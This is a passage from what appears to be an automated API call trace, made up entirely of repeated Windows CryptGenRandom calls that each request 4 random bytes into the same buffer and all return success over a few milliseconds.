(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.424] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.425] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.426] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.427] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.428] 